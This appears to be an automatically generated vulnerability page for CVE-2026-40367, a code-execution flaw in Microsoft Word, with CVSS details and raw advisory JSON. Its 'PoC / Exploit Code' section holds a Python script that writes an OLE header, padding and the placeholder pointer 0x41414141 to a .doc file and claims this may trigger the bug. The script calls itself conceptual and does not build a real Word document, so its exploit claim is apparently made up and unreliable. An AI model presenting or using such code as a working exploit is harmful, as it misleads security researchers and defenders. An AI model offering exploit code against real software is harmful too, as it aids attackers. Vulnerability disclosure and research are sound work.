Security Vulnerability Report
中文
CVE-2026-40367 CVSS 8.4 HIGH

CVE-2026-40367

Published: 2026-05-12 18:17:16
Last Modified: 2026-05-13 15:34:53

Description

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microsoft Office Word (具体受影响版本请参考微软安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This is a conceptual Proof of Concept generator for CVE-2026-40367 # It demonstrates how to craft a file structure that triggers the untrusted pointer dereference. import struct def generate_malicious_doc(filename): # Header for a generic Office file format (simplified) header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1' # OLE header # Constructing a payload with a malicious pointer # Offset 0x100 usually contains critical structure pointers # We inject an invalid or controlled address (e.g., 0x41414141) malicious_pointer = struct.pack('<I', 0x41414141) # Padding to reach the vulnerable structure offset padding = b'\x00' * 0xF8 # Combine data data = header + padding + malicious_pointer with open(filename, 'wb') as f: f.write(data) print(f"[+] Malicious file '{filename}' generated successfully.") print(f"[+] Attempting to open with Microsoft Word may trigger the vulnerability.") if __name__ == "__main__": generate_malicious_doc("cve_2026_40367_poc.doc")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40367", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:15.760", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-822"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40367", "source": "[email protected]"}]}}